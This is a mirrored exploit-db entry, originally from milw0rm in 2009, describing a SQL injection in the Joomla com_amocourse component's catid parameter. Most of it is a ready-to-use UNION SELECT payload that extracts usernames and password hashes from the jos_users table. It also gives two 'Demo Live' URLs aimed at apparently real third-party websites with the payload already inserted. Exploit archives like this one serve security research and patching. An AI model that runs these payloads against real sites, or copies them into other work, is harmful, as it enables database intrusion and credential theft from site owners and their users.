bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/9016.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

41 lines
No EOL
1.2 KiB
Text
Raw Blame History

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_amocourse (catid) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt
[+] Vulnerability : SQL injection
###################################################
Example:
http://localHost/path//index.php?option=com_amocourse&task=view&view=category&catid=n[SQL code]
n = catid valid
[SQL code]
+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
Demo Live (1)
http://www.kaieden.com/joomla/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
Demo Live Mambo (2)
http://www.tangotherapy.co.uk/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2009-06-24]
Reference in a new issue View git blame Copy permalink